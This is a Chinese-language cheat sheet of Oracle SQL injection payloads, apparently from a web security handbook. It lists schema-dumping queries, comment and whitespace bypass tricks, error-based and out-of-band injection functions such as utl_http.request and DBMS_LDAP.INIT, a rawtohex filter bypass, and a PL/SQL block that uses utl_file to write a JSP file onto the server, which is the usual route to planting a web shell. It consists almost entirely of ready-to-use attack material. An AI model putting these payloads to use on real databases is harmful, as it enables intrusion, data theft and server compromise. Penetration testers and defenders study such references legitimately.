4.1.7.4. Oracle Payload¶
4.1.7.4.1. 常见Payload¶
- dump
select * from v$tablespace;
select * from user_tables;
select column_name from user_tab_columns where table_name = 'table_name';
select column_name, data_type from user_tab_columns where table_name = 'table_name';
SELECT * FROM ALL_TABLES
- Comment
--
/**/
- Space
0x00
0x09
0xa-0xd
0x20
- 报错
utl_inaddr.get_host_name
ctxsys.drithsx.sn
ctxsys.CTX_REPORT.TOKEN_TYPE
XMLType
dbms_xdb_version.checkin
dbms_xdb_version.makeversioned
dbms_xdb_version.uncheckout
dbms_utility.sqlid_to_sqlhash
ordsys.ord_dicom.getmappingxpath
utl_inaddr.get_host_name
utl_inaddr.get_host_address
- OOB
utl_http.request
utl_inaddr.get_host_address
SYS.DBMS_LDAP.INIT
HTTPURITYPE
HTTP_URITYPE.GETCLOB
- 绕过
rawtohex
4.1.7.4.2. 写文件¶
create or replace directory TEST_DIR as '/path/to/dir';
grant read, write on directory TEST_DIR to system;
declare
isto_file utl_file.file_type;
begin
isto_file := utl_file.fopen('TEST_DIR', 'test.jsp', 'W');
utl_file.put_line(isto_file, '<% out.println("test"); %>');
utl_file.fflush(isto_file);
utl_file.fclose(isto_file);
end;